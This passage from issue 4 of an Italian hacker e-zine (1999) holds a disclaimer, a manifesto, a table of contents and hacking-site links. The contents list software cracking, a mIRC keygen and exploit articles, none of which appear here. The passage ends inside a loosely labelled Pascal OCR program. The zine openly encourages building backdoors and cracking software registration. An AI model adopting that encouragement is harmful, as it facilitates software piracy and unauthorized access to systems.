Newbies 4
Transcript
Newbies 4
@-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@ | _ _ ____ _ | | | \ | | _____ _| __ )(_) ___ ___ | -+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+: | |\ | __/\ V V /| |_) | | __|__ \ : | |_| \_|\___| \_/\_/ |____/|_|\___|___/ | @-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@ NEW BIES (num 4) (data 26/08/99) [ powered By ZeroCool and N0bodY88 ] DISCLAIMER LEGALE -----------------------------------------------------------------------------IL NEWBIES STAFF NON SI ASSUME NESSUNA RESPONSABILITA' X L'UTILIZZO DELLE TECNICHE SOTTO RIPORTATE, LE QUALI SONO STATE DISTRIBUITE UNICAMENTE X CONDIVIDERE LE CONOSCENZE DA NOI "ACUISITE" (mitico edu...) E PER CERCARE QUALCUNO CON CUI CONFONTARE LE NS ESPERIENZE E LE CONOSCENZE X MIGLIORARE VICENDEVOLMENTE.....DIVERTENDOSI! N0bodY88 of NewBies Staff -----------------------------------------------------------------------------PREMESSA ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ Questa e-zine e' nata in una giornata qualsiasi di gennaio, mentre 2 newbies stavano parlando tra loro in IRC di non mi ricordo cosa. Da quel fatidico giorno la e-zine e' cresciuta, le persone che ho contattato x scrivere un articolo mi hanno dato la loro disponibilita' e entro alcuni giorni mi hanno fatto avere il loro operato. Alcune persone hanno fatto tardi x notti intere (fra cui il sottoscritto) ed hanno sacrificato il loro tempo x creare qualcosa che fosse nuovo, divertente, che ci facesse diventare + bravi, + amici, + uniti e forse...beh...forse anche + famosi...hihihi! Questo e' quello che abbiamo realizzato insieme, collaborando e scambiandoci opinioni. Se questa e-zine non vi piace, e' troppo semplice o e' stupida non scriveteci (oppure scriveteci x migliorare un art. della e-zine sfruttando le vostre conoscenze) ma se solo sara' piaciuta ad una persona, se solo un ragazzo dopo aver letto questa avra' deciso di passare a linux, di programmare in visual basic, di farsi una propria backdoor o di mettersi a studiare come si usa telnet (troppo poco attrezzato di voci nei menu x essere quello tanto decantato dovunque, ma anche troppo simpatico con il suo prompt a mo di Commodore 64) allora questa e-zine sara' servita a qualcosa. E ricordate...newbies si nasce, hacker si diventa. Buona lettura ^__^ N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ INTRODUZIONE: Creatura nata per vivere e cibarsi del Sacro cibo della Conoscenza , attendiamo alla ricerca di nuovi orizzonti nuove culture con cui confrontarci. Crediamo da tempo in cio' che altri non credono Vediamo cio' che gli altri non immaginano , Sentiamo il suono della conoscenza che impregna la vista e la mente , Noi siamo il futuro , un futuro in cui il mondo cieco e stolto non vuole credere . Siamo hacker e ricorda tu stolto che il nostro grido e' unisono : CoNosCenZa . Il mondo forse non e' preparato ad accetare usi e idee che quotidianamente noi promulghiamo. Tu giudicatore Tu fautore di morte ... Ricorda noi siamo e sempre saremo piu' forti di te' perche' il sapere ci affascina come un frutto proibito e quotidianamente ce ne cibiamo. Questo e' il mio credo , la mia vita e il mio essere stesso.. ZeroCool ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Í» º ARTICOLO ÌÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎ͹ AUTORE º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Í¹ |PREMESSA N0bodY88 | |INTRODUZIONE ZeroCool | |NOVITA' NewBies Staff | ³ BFI, SPIPPOLATORI, T0RMENTO, VANA IMAGO E TANTO ALTRO N0bodY88 ³ ³ ACTUAL SITUATION: [DIFFERENCE] ZeroCool ³ ³ RIEPILOGO LINK IN ORDINE ALFABETICO N0bodY88 ³ |INFO SUGLI ALLEGATI NewBies Staff | ³ 2 PAROLE SUGLI ALLEGATI N0bodY88 ³ |PROGRAMMAZIONE NewBies Staff | ³ GENESIS (GEneral NEural SImulation System) ZeroCool ³ ³ PROGETTO ANGELA : OVVERO COME BUTTARE IL TEMPO ;) N0bodY88 ³ |CRACKING NewBies Staff | ³ HOW TO VTT 1.75 DeViLNeT ³ ³ GENERATORE DI CHIAVI X MIRC32 5.6 Cod ³ ³ MA XCHE' SBORSARE 29 DOLLARI PER REGISTRARE WINZIPPO ???? DeViLNeT ³ ³ APPROFONDIMENTO SULLE CHIAVI HASP BlackDruiD ³ |TEORIA NewBies Staff | ³ SOX...WINGAYZ E PROXY...CHE CONFUSIONE... Dante Alighieri³ ³ ER COSIDDETTO MONITORAGGIO N0bodY88 ³ |TRADUZIONI NewBies Staff | ³ COME CAMBIARE IL NOME DI REGISTRAZIONE DI WINDOWS 95 E 98 N0bodY88 ³ ³ FINGERD EXPLOIT N0bodY88 ³ |LE INTERVISTE E LE NOTTATE IMPOSSIBILI NewBies Staff | ³ INTERVISTA AD UN PERFETTO ANONIMO N0bodY88 ³ |PHREAKING NewBies Staff | ³ TELECUM BRUTE FORCIN' Dante Alighieri³ |LINUX - UNIX - VARI NewBies Staff | ³ COME PARTIZIONARE L'HD X LINUX Z10-K41i ³ ³ GESTIONE DEI PERMESSI SU FILE E DIRECTORY DI LINUX/UNIX EsPoNeNtIaL FoRcE³ ³ SCHERZI SIMPATICI DA FARE AL SYSADMIN Pankrazio ³ ³ TABELLUZZA DI VI Dante+N0bodY88 ³ ³ MINI GUIDA ALL'INSTALLAZIONE DI BITCHX SOTTO UNIX OS \JusTme\ ³ ³ COME CI SI MUOVE IN LINUX St0rM BriNgeR ³ ³ COME SI CREA UN NUOVO UTENTE IN LINUX St0rM BriNgeR ³ ³ COSA FARE DOPO AVER OTTENUTO ACCESSO AD UNA SHELL St0rM BriNgeR ³ ³ FILOSOFIA DI UNIX X-ReWoP ³ ³ COME MONTARE IL CDROM IN LINUX St0rM BriNgeR ³ |IL MONDO DI IRC NewBies Staff | ³ GUIDA X I BOT FOR REALLY NEWBIES BUT GOOD TO READ Pankrazio ³ ³ SkRiPT mIRC? NO POBBEM! 1^tempo Ennaro ³ ³ IRCWAR - FONDAMENTI St0rM BriNgeR ³ |HACKING DI TUTTO DI PIU' E DIVERSI ART. MOLTO INTERESSANTI NewBies Staff | ³ IL MIO IP? BOH! Mr Skull ³ ³ LE LEGGI IN ITALIA SULL'HACKING S_A_S_H_A ³ ³ GUIDA ALL' ASSEMBLAGGIO DI UN COMPUTER DALLA A ALLA Z Devil_666 ³ ³ MANIFESTO DI CARNIFEX Carnifex ³ ³ RENDIAMOCI ANONIMI ZeroCool ³ ³ IL MIO EXPLOIT PREFERITO... SM 8.8.4 !!! Dante Alighieri³ ³ TELEPIU' TERRESTRE: INFO VARIE JohnnyRunner ³ ³ BENZINA A GO G0! HarLoK ³ ³ BREVE E SEMPLICE LISTA DI ATTACCHI BASATI SU DATI KarmA_YogA ³ ³ MP3 IN AUTO: FANTASIE OLTRE LA REALTA' JohnnyRunner ³ ³ L'UOVO DE COLOMBO Dante Alighieri³ ³ QUALKE TRUCCO DA PIPPO CALO' Pippo Calo' ³ |SALUTI N0bodY88 | ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÙ ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°°°°°°°°°°ÛÛÛ°°°ÛÛ°°ÛÛÛÛÛÛ°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛ°°°°°°°°² ²°°°°°°°°°°°ÛÛÛÛ°°ÛÛ°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°ÛÛ°°°°°°°Û°°°ÛÛ°°°Û°°°°°ÛÛÛ°°ÛÛ°°°°°°°°² ²°°°°°°°°°°°ÛÛ°ÛÛ°ÛÛ°°ÛÛ²²ÛÛ°°°°ÛÛ°°°ÛÛ°°°°ÛÛ°°ÛÛÛ°ÛÛ°ÛÛÛ°°°°ÛÛ²ÛÛ°°°°°°°°°°°² ²°°°°°°°°°°°ÛÛ°°ÛÛÛÛ°°ÛÛ²²ÛÛ°°°°°ÛÛ°ÛÛ°°°°°ÛÛ°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛÛÛ°°°°°°°°°°² ²°°°°°°°°°°°ÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ°°°°°°ÛÛ°°°°°°ÛÛ°°°°°ÛÛ°°°°°°°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ BFI, SPIPPOLATORI, T0RMENTO, VANA IMAGO E TANTO ALTRO ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ BFI = ovviamente parlando di BFI non si puo' non nominare il fantastico gruppo che ci sta dietro ovvero quelli di softproject, che sono uno tra i gruppi piu' tosti e produttivi della scena italiana, e non solo x la loro e-zine x la quale i complimenti sono sempre troppo pochi rispetto a quelli che meriterebbe, ma anke x il loro fantastico sito che potete vedere andando al www.softpj.com x il quale /sPIRIT/ se non ha sudato sangue poco ci manca... Non perdetevi inoltre i vari exploit scoperti (e qui si denota anke il livello del gruppo) dai membri del softpj stessi. Come al solito che la maledizione vi colga se vi perdete anke+ un solo bit di sito e e-zine... inoltre leggetevi il mitico numero 6 (che io ho gia' stampato) e il number estivo speciale x il quale vi dovrete far ricoverare x tremenda ridarola acuta... SPIPPOLATORI = gli spippolatori continuano a sfornare ottimi numeri della loro magnifica e-zine NetRunners piena di articoli interessanti che sta avendo un successo sia x le qualita' e la voglia di fare degli scrittori sia x l'ampia conoscenza che sta alle spalle di quei nomi che vedete in fondo agli articoli. Il sito ormai considerato un must sia x il newbies sia x l'hacker piu' affermato ha cominciato il grande e mitico progetto di cercare di raccogliere in un unico sito tutte le e-zine nostrane attinenti all'hacking e a tutte le varie forme di liberta' e protesta. Segnalo inoltre la marea di testi disponibile sul sito di produzione degli Spp ma anke mirrorata dai piu' famosi siti di hacking, unix e dintorni come quello dei dislessici, quello di quequero e molti altri di cui sarete felici di fare la conoscenza... RINGZERO = questo sito creato dal gruppo stesso di Ring0 continua a pubblicare sempre nuovi tut e sempre piu' interssanti che vanno bene sia x chi di crackers conosce solo quelli da mangiare sia x chi la sera dialoga in chat con xOANON, +ORC o FRAVIA quindi fate un po' voi ma se anke solo minimamente vi interessate di programmazione e/o craking io un sito cosi' non credo che me lo perderei x nulla al mondo...quindi crackers di tutti italia...tutti subito al mitico sito http://ringzer0.cjb.net e vai giu' di teleport ;) T0RMENT0 = ebbene si' con mia enorme gioia T0rment0 ha deciso di fare una propria e-zine che sinceramente mi sembra molto piu' che valida e che abbraccia la filosofia dei newbies. Ottima sia come raccolta di exploit che come guida x non scoraggiarsi davanti ai listati di c o ai comandi e la filosofia di unix...che dire...scaricatevela e giudicatela voi ovviamente al sito del ns mitico scrittore (e ora anke redattore) T0rment0. E ricordatevi di dare una okkiata anke al resto del sito oltre a scaricare la e-zine...dove direte voi? Ovviamente a http://web.interpuntonet.it/xj/ !!! VANA IMAGO = che dire imo una e-zine molto bella fatta da un grande amico che mi dispiace vedere cosi' poco, x il resto che dire...basta che ve la scarichiate e andrete da dio! Per chi non visita + il sito da un po' sappiate che e' uscito il mitico numero 3 quindi correte in edicola..ehm...scusate...sapete...l'emozione... QUEQUERO = l'ormai sempre piu' ricercato Quequero sta sulle bocche di tutti con la sua fantastica UIC (Universita' Italiana di Cracking) dove trovare tutorial, attrezzi del mestiere, consigli e molto molto altro (se non quasi tutto) che potete subito andare a visitare scrivendo nella barra del vostro browser (ie o netscape non importa tanto imo (x i precisini lo so ci sono anke opera, lynx etc ;P)) il seguente url http://quequero.cyb.net dopodiche' crackare non sara' piu' un sogno cosi' lontanto anke se nonostante tutto la strada e' lunga e in salita ma poi arriva la discesa :) ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ ACTUAL SITUATION: [DIFFERENCE] ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ La situazione attuale in italia prevede l'implementazione di " un nuovo " sistema di trasmissione dati l'adsl implementato per ora a milano a quanto so' da 200 beta tester . La formula inq uestione che verra' adottata sara' di due tipi: connessione a 2mb/s con ipfisso connessione a 4mb/s con ipfisso I prezzi non saranno la bolletta telefonica e il costo dell'abbonamento pur adsl addottando la normale linea telefonica per il collegamento . [invia una stringa alfanumerica al provider]. Ci sara'solamente un fisso da pagare e 0 bolletta al momento non conosco i prezzi. The situation in usa is different between italy we have now implement a various type of technology : adsl [aol 4mb/s ] and cable 7 [1.2mb/s] The price that society as aol and cable inwiry offer are very good in this period we 've a price of 20USD for month for cable seven and about 80USD for aol service.. I know that some place in usa are not connected to this service as ohio [for adsl] . Cable modem prize and connectivity from some Inc. are up higher. ZeroCool ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ RIEPILOGO LINK IN ORDINE ALFABETICO ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ [ [ [ [ [ [ [ [ [ [ [ [ D.I.B. ----------------------------------------------> http://come.to/dib NetRunners ---------------------> http://members.tripod.com/~teresacanis/ NewBies -----------------------------------------> http://newbies.tsx.org Quequero ---------------------------------------> http://quequero.cjb.net RFC (sito dove le potete trovare) ------------> http://www.faqs.org/rfcs/ RingZ3rO ---------------------------------------> http://ringzer0.cjb.net Softpj -------------------------------------------> http://www.softpj.com SoftWord ------------------------------------------> softword.webjump.com Spaghetti Phreakers -----------------> http://come.to/spaghettiphreakers/ Spippolatori -------------------------------> http://www.spippolatori.com T0rment0 -------------------------------> http://web.interpuntonet.it/xj/ Vana - Imago ------------------> http:/members.xoom.com/eripper/index.htm ] ] ] ] ] ] ] ] ] ] ] ] NOTA DI N0bodY88 = Se volete che il nome della vs crew con l'url del vs sito sia presente nella soprascritta tabella basta che ce lo comunichiate e sara' fatto sia x siti newbies che x siti di hacking. ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°°°°°°°°°°°°°°°°°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛ°°ÛÛÛÛÛÛÛ°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°Û°°°°°°°°°°°°² ²°°°°°°°°°°°ÛÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°°°°°°ÛÛÛ°°°°°°ÛÛÛ°°°°°°°°°°°°°°°°°°°² ²°°°°°°°°°°ÛÛ²ÛÛ°°°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛ°°ÛÛ°ÛÛÛÛ°°°ÛÛ²ÛÛ°°°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°² ²°°°°°°°°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°² ²°°°°°°°°ÛÛ°°°°°ÛÛ°ÛÛÛÛÛ°ÛÛÛÛÛ°ÛÛÛÛ°°ÛÛÛÛÛÛÛ°ÛÛ°°°°°ÛÛ°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ 2 PAROLE SUGLI ALLEGATI: - angela.pas = sorgente del programma angela fatto da un pazzo della crew... - angela.exe = l'eseguibile x chi non ha tempo di installarsi pascal o x chi vuole dare solo un occhiata a che cazzata di prog e'... - mirckey.exe = prog che genera le chiavi x mirc fatto dal mitico cod. ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°ÛÛÛ°ÛÛÛ°ÛÛÛ°ÛÛÛÛ°ÛÛÛ°°°°°Û°°°°°ÛÛ°°°ÛÛÛÛ°°°ÛÛ°°°°°Û°°°°°ÛÛÛ°Û°ÛÛÛ°ÛÛ°°Û°ÛÛ°² ²°Û°Û°Û°Û°Û°Û°Û°°°°Û°Û°°°°ÛÛÛ°°°°Û°Û°Û°ÛÛ°Û°Û°Û°°°°ÛÛÛ°°°°°°Û°Û°Û°Û°Û°Û°Û°Û°°² ²°ÛÛÛ°ÛÛÛ°Û°Û°Û°ÛÛ°ÛÛÛ°°°ÛÛ°ÛÛ°°°Û°°Û°°ÛÛ°°Û°°Û°°°ÛÛ°ÛÛ°°°°Û°°Û°Û°Û°Û°°ÛÛ°ÛÛ°² ²°Û°°°ÛÛ°°Û°Û°Û°°Û°ÛÛ°°°ÛÛÛÛÛÛÛ°°Û°°°°°ÛÛ°°°°°Û°°ÛÛÛÛÛÛÛ°°Û°°°Û°Û°Û°Û°°°Û°Û°°² ²°Û°°°Û°Û°ÛÛÛ°ÛÛÛÛ°Û°Û°ÛÛ°°°°°ÛÛ°Û°°°°°ÛÛ°°°°°Û°ÛÛ°°°°°ÛÛ°ÛÛÛ°Û°ÛÛÛ°Û°°°Û°ÛÛ°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ GENESIS (GEneral NEural SImulation System) ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ GENESIS (GEneral NEural SImulation System) Morgan Kaufmann, San Mateo, CA. 485-492, 1989 Genesis come potete leggere e' un progetto di tutto conto . Sinceramente i progetti sperimentali mi hanno sempre interessato e quindi una volta riinstallato per la 100 volta il mio caro unix ho compilato subito questo pakketo indubbiamente unico nel suo genere . Ma volutamente distribuito con i source e docz per una eventuale modifica. Bhe dopo due giorni di attenta lettura e documentazione folle tra le migliori universita' online mi sono venute un paio di idee che ho subito applicato , bhe vediamole insieme Genesis in se ' stesso ha una struttura molto ramificata ma semplice e ideale per una sua ricompilazione con eventuali modiche che ho apportato. bhe pensiamo di modificarlo per non limitarlo alle 4 funzioni [guia'bellisime che gli sono s tate assegnate] allora: /************************************************************************ * * * File: test.pas * * * * training and analysis of * * multilayer perceptron (MLP) neural networks for mapping. Such * * networks have sigmoidal hidden units and linear activations in * * the output units. * * * * General routines. * * * ************************************************************************ program OCR; (* (c) Program -(1) reads PCX file into a viewport ; (2) converts viewport to a 2 dimensional picture (Xs and .s); (3) execs to BrainMaker (a neural network); (4) BrainMaker evaluates the pictures; (4) converts BrainMaker output evaluations to text; requires BrainMaker neural net (from California Scientific Software) and PCX Tools (from Genesis Programming). *) uses Crt, Dos, Graph, pcx_tp; var F, F2 : text; const { BGI fonts } Fonts : array[0..4] of string[13] = ('DefaultFont', 'TriplexFont', 'SmallFont', 'SansSerifFont', 'GothicFont'); { BGI text directions } TextDirect : array[0..1] of string[8] = ('HorizDir', 'VertDir'); Num_of_patterns Num_of_characters Input_file_from_neural_net Output_file_for_neural_net OCR_Output_file PCX_file Line_length Threshold PCX_type = = = = = = = = = 10; 2000; { for 80 x 25 Viewport } 'C:\TP\EXE\BrainRTS.Out'; 'C:\TP\EXE\BrainRTS.In'; 'C:\TP\EXE\OCR.Out'; 'C:\TP\EXE\a.PCX'; 79; 0.60; pcxCGA_6; type Weights = array[1..Num_of_characters] of string[4]; Patterns = array[1..Num_of_characters] of string[1]; { objects } NNIptr = ^neural_net_interpreter; neural_net_interpreter = object Array_index : integer; First_char, S : string; Weight : Weights; Output_pattern : Patterns; constructor Init; destructor Done; virtual; procedure Get_weights; procedure Output_characters; end; Screenptr = ^screen; screen = object GraphDriver : integer; { Graphics device driver } GraphMode : integer; { Graphics mode value } MaxX, MaxY : word; { Maximum screen resolution } ErrorCode : integer; { Reports any graphics errors } MaxColor : word; { Maximum color value available } pcxReturn : integer; PixelStatus : integer; ViewInfo : ViewPortType; constructor init; destructor done; virtual; procedure Initialize; end; var OldExitProc : Pointer; { Saves exit procedure address } {$F+} procedure MyExitProc; begin ExitProc := OldExitProc; { Restore exit procedure address } CloseGraph; { Shut down the graphics system } end; { MyExitProc } {$F-} procedure screen.Initialize; { Initialize graphics and report errors} var InGraphicsMode: boolean; { Flags graphics initialization} PathToDriver : string; { Stores DOS path to *.BGI & *.CHR } begin { When using Crt & graphics, turn } { off Crt's memory-mapped writes } DirectVideo := False; OldExitProc := ExitProc; { Save previous exit proc } ExitProc := @MyExitProc; { Insert our exit proc in chain } PathToDriver := ''; repeat GraphDriver := Detect; { Autodetect graphics adapter } InitGraph(GraphDriver, GraphMode, PathToDriver); ErrorCode := GraphResult; { Preserve error return } if ErrorCode <> grOK then { Error? } begin Writeln('Graphics error: ', GraphErrorMsg(ErrorCode)); if ErrorCode = grFileNotFound then begin Writeln('Enter full path to BGI driver'); Writeln('or type <Ctrl-Break> to quit.'); Readln(PathToDriver); Writeln; end else Halt(1); { Some other error: terminate } end; until ErrorCode = grOK; end; { Initialize } { object constructors & destructors } constructor screen.init; begin end; destructor screen.done; begin end; constructor neural_net_interpreter.init; begin end; destructor neural_net_interpreter.done; begin end; { object methods } procedure neural_net_interpreter.Get_weights; var This_weight : string[4]; This_pattern : string[1]; Count : integer; W : word; Char_Ptr : integer; begin FOR Count := 1 TO Num_of_characters DO begin Weight[Count] := ' '; Output_pattern[Count] := ' '; end; { Initialize arrays } Assign(F,Input_file_from_neural_net); Reset(F); Array_index := 1; WHILE Array_index <= Num_of_characters DO begin Readln(F,S); First_char := Copy(S,1,1); IF First_char = ' ' THEN begin Char_Ptr := 2; FOR Count := 1 TO Num_of_patterns DO begin This_weight := Copy(S,Char_Ptr,4); Weight[Array_index] := This_weight; Char_Ptr := Char_Ptr + 5; This_pattern := Copy(S,Char_Ptr,1); Output_pattern[Array_index] := This_pattern; Char_Ptr := Char_Ptr + 2; Inc(Array_index); end; end; end; Close(F); end; procedure neural_net_interpreter.output_characters; var Output_char : string; Pattern_count, Char_count, ReturnCode : integer; Wt, New_weight : real; begin Assign(F2,OCR_Output_file); Rewrite(F2); Array_index := 1; Char_count := 1; WHILE Array_index <= Num_of_characters DO begin Pattern_count := 1; Wt := 0; Output_char := ' '; WHILE Pattern_count <= Num_of_patterns DO begin Val(Weight[Array_index],New_weight,ReturnCode); IF New_weight > Wt THEN begin Wt := New_weight; Output_char := Output_pattern[Array_index]; end; Inc(Pattern_count); Inc(Array_index); end; IF Wt >= Threshold THEN Write(F2,Output_char) ELSE Write(F2,' '); IF Char_count > Line_length THEN begin Writeln(F2); Char_count := 0; end; Inc(Char_count); end; Close(F2); end; var NNI : NNIptr; procedure pcx_to_neural_net; { get a.PCX; display it; & convert it to txt for neural net. } var SPort : X, Y : XPt, YPt, RowPt : S : Screenptr; integer; integer; string; begin New(SPort,init); WITH SPort^ DO begin Initialize; Maxx := GetMaxx; Maxy := GetMaxy; SetViewPort(0,0,Maxx,Maxy,ClipOn); SetTextStyle(DefaultFont, HorizDir, 1); pcxReturn := pcxSetDisplay(PCX_type); pcxReturn := pcxFileDisplay(PCX_file,0,0,0); IF (pcxReturn = pcxSuccess) THEN begin Assign(F,Output_file_for_neural_net); Rewrite(F); GetViewSettings(ViewInfo); { coordinates of Viewport } XPt := 0; YPt := 0; RowPt := 0; WHILE RowPt <= ViewInfo.y2 DO begin WHILE XPt <= 